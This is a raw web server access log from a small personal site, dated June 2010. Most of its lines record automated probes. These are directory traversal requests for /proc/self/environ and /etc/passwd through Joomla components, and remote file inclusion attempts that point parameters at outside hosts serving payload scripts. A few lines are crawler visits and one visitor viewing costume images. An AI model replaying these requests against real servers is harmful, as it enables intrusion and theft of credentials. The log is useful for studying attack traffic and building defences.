67.195.112.180 - - [01/Jun/2010:19:01:07 -0500] "GET /logs/access_log.1189814400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.191.94.188 - - [01/Jun/2010:19:02:16 -0500] "GET /logs/access_log.1273363200//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
196.15.192.133 - - [01/Jun/2010:19:03:29 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
196.15.192.133 - - [01/Jun/2010:19:03:36 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
88.191.94.188 - - [01/Jun/2010:19:03:36 -0500] "GET /logs/access_log.1273363200//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
203.174.82.170 - - [01/Jun/2010:19:03:38 -0500] "GET /logs/index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
203.174.82.170 - - [01/Jun/2010:19:03:38 -0500] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
196.15.192.133 - - [01/Jun/2010:19:03:44 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.241.55.5 - - [01/Jun/2010:19:05:39 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
200.241.55.5 - - [01/Jun/2010:19:05:39 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
207.46.204.184 - - [01/Jun/2010:19:15:11 -0500] "GET /logs/access_log.1185926400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.240 - - [01/Jun/2010:19:15:41 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [01/Jun/2010:19:24:06 -0500] "GET /artwork/carousel.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.230 - - [01/Jun/2010:19:26:14 -0500] "GET /logs/access_log.1188000000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
123.243.67.208 - - [01/Jun/2010:19:30:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
194.100.228.237 - - [01/Jun/2010:19:30:58 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:19:30:58 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:19:30:59 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:19:30:59 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
124.217.229.185 - - [01/Jun/2010:19:33:07 -0500] "GET /logs/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.810"
124.217.229.185 - - [01/Jun/2010:19:33:08 -0500] "GET /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.810"
207.46.199.37 - - [01/Jun/2010:19:33:10 -0500] "GET /logs/access_log.1198886400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
196.15.192.133 - - [01/Jun/2010:19:34:00 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
196.15.192.133 - - [01/Jun/2010:19:34:12 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
196.15.192.133 - - [01/Jun/2010:19:34:19 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.46.199.178 - - [01/Jun/2010:19:34:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
196.15.192.133 - - [01/Jun/2010:19:35:01 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.54.78.146 - - [01/Jun/2010:19:44:51 -0500] "GET /logs/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.54.78.146 - - [01/Jun/2010:19:44:51 -0500] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.54.78.146 - - [01/Jun/2010:19:45:13 -0500] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
188.18.132.58 - - [01/Jun/2010:19:45:47 -0500] "GET /logs/access_log.1271721600+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
74.54.78.146 - - [01/Jun/2010:19:46:23 -0500] "GET /logs//index.php?option=com_juser&mosConfig.absolute.path=http://www.hotelcesareaugustus.com/swf/tukulid.pdf?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.54.78.146 - - [01/Jun/2010:19:46:23 -0500] "GET /logs/access_log.1219276800//index.php?option=com_juser&mosConfig.absolute.path=http://www.hotelcesareaugustus.com/swf/tukulid.pdf?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.54.78.146 - - [01/Jun/2010:19:46:23 -0500] "GET //index.php?option=com_juser&mosConfig.absolute.path=http://www.hotelcesareaugustus.com/swf/tukulid.pdf?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
188.18.132.58 - - [01/Jun/2010:19:47:13 -0500] "GET /logs/access_log.1272240000+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
74.54.78.146 - - [01/Jun/2010:19:51:07 -0500] "GET /logs/access_log.1274832000/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
74.54.78.146 - - [01/Jun/2010:19:51:07 -0500] "GET /http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.54.78.146 - - [01/Jun/2010:19:51:07 -0500] "GET /logs/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.52.108.58 - - [01/Jun/2010:19:56:41 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.164.131.82 - - [01/Jun/2010:19:58:27 -0500] "GET /logs/index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.164.131.82 - - [01/Jun/2010:19:58:28 -0500] "GET /index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.112.180 - - [01/Jun/2010:19:59:22 -0500] "GET /logs/access_log.1200614400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.39.255.92 - - [01/Jun/2010:19:59:32 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGIH_enUS247US247&q=prussian+army+sidearm+1750-1800""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:19:59:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/thmb8.htm HTTP/1.1" 200 3054 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/costume85%20copy.JPG HTTP/1.1" 200 15605 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/costume86%20copy.JPG HTTP/1.1" 200 15576 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/costume87%20copy.JPG HTTP/1.1" 200 16142 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/costume88%20copy.JPG HTTP/1.1" 200 16167 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/costume89%20copy.JPG HTTP/1.1" 200 15870 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/costume91%20copy.JPG HTTP/1.1" 200 15666 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/costume92%20copy.JPG HTTP/1.1" 200 19543 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/costume93%20copy.JPG HTTP/1.1" 200 16031 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:12 -0500] "GET /costume/costume94%20copy.JPG HTTP/1.1" 200 15637 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:13 -0500] "GET /costume/costume90.JPG HTTP/1.1" 200 54972 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:13 -0500] "GET /costume/costume95%20copy.JPG HTTP/1.1" 200 17593 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
75.39.255.92 - - [01/Jun/2010:20:00:13 -0500] "GET /costume/costume96%20copy.JPG HTTP/1.1" 200 16829 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
216.245.220.19 - - [01/Jun/2010:20:02:41 -0500] "GET /logs//index.php?option=com_redtwitter&view=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.245.220.19 - - [01/Jun/2010:20:02:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.245.220.19 - - [01/Jun/2010:20:02:41 -0500] "GET //index.php?option=com_redtwitter&view=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:20:04:46 -0500] "GET /logs//index.php?option=com_redtwitter&view=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:20:04:46 -0500] "GET //index.php?option=com_redtwitter&view=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.174.120.30 - - [01/Jun/2010:20:04:46 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=http://www.premiumriviera.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [01/Jun/2010:20:07:10 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
67.72.98.45 - - [01/Jun/2010:20:07:49 -0500] "GET /logs/access HTTP/1.1" 404 295 "-""Mozilla/3.0 (compatible)"
67.72.98.45 - - [01/Jun/2010:20:07:50 -0500] "GET /logs/access HTTP/1.1" 404 295 "-""Mozilla/3.0 (compatible)"
66.246.72.178 - - [01/Jun/2010:20:11:17 -0500] "GET /logs//includes/class_item.php?fileExtension=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:20:11:17 -0500] "GET //includes/class_item.php?fileExtension=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:20:11:17 -0500] "GET /logs/access_log.1271376000//includes/class_item.php?fileExtension=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
72.30.142.216 - - [01/Jun/2010:20:11:29 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [01/Jun/2010:20:11:29 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/Jun/2010:20:14:34 -0500] "GET /logs/access_log.1186185600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.167.132.200 - - [01/Jun/2010:20:19:15 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.167.132.200 - - [01/Jun/2010:20:19:15 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
94.23.0.30 - - [01/Jun/2010:20:19:25 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
193.41.235.46 - - [01/Jun/2010:20:19:27 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [01/Jun/2010:20:19:27 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
94.23.0.30 - - [01/Jun/2010:20:19:28 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
193.41.235.46 - - [01/Jun/2010:20:19:31 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [01/Jun/2010:20:19:31 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
94.23.0.30 - - [01/Jun/2010:20:19:34 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [01/Jun/2010:20:19:35 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
89.145.108.230 - - [01/Jun/2010:20:19:36 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [01/Jun/2010:20:19:36 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
174.121.158.187 - - [01/Jun/2010:20:19:40 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [01/Jun/2010:20:19:40 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
67.225.136.72 - - [01/Jun/2010:20:19:45 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.225.136.72 - - [01/Jun/2010:20:19:45 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
80.233.172.42 - - [01/Jun/2010:20:20:02 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [01/Jun/2010:20:20:03 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
69.167.132.200 - - [01/Jun/2010:20:20:18 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.167.132.200 - - [01/Jun/2010:20:20:18 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
67.225.136.72 - - [01/Jun/2010:20:20:20 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.225.136.72 - - [01/Jun/2010:20:20:20 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
89.145.108.230 - - [01/Jun/2010:20:20:23 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [01/Jun/2010:20:20:23 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
69.167.132.200 - - [01/Jun/2010:20:20:23 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.167.132.200 - - [01/Jun/2010:20:20:23 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
67.225.136.72 - - [01/Jun/2010:20:20:24 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.225.136.72 - - [01/Jun/2010:20:20:24 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
174.121.158.187 - - [01/Jun/2010:20:20:26 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [01/Jun/2010:20:20:26 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
174.121.158.187 - - [01/Jun/2010:20:20:27 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [01/Jun/2010:20:20:27 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [01/Jun/2010:20:20:30 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [01/Jun/2010:20:20:30 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
207.46.195.242 - - [01/Jun/2010:20:20:40 -0500] "GET /logs/access_log.1250294400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.164.131.82 - - [01/Jun/2010:20:20:43 -0500] "GET /logs/index2.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.164.131.82 - - [01/Jun/2010:20:20:43 -0500] "GET /index2.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.241.176.6 - - [01/Jun/2010:20:21:07 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.176.6 - - [01/Jun/2010:20:21:07 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
212.241.176.6 - - [01/Jun/2010:20:21:46 -0500] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
212.241.176.6 - - [01/Jun/2010:20:21:46 -0500] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
74.54.78.146 - - [01/Jun/2010:20:23:34 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.41.235.46 - - [01/Jun/2010:20:25:47 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.808"
193.41.235.46 - - [01/Jun/2010:20:25:47 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.808"
94.23.0.30 - - [01/Jun/2010:20:25:50 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.803"
